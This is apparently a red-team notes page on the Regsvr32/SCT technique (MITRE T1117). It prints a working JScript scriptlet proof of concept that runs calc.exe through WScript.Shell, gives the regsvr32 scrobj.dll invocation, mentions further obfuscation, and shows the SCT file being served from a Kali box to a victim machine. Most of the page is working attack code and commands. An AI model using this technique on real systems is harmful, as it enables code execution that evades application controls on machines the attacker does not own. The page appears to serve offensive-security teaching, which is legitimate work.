Regsvr32
ID: T1117 Tactic: Defense Evasion, Execution
This technique uses a SCT file loaded remotely.
SCT: Script used to create a Component Object Model (.COM) component, may be written in various scripting languages such as VBScript, JavaScript, or JScript; runs itself in Windows if the Windows Scripting Host is installed.
A very basic SCT file that will execute calc.exe :
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
var scr = new ActiveXObject("MSScriptControl.ScriptControl");
scr.Language = "JScript";
scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
//Lots of hints here on futher obfuscation
]]></script>
</registration>
</scriptlet>I will host this on my Kali box using python3
sudo python3 -m http.server 80
Now let's call it from our Victim Box.
And execute
Demo:
Last updated
Was this helpful?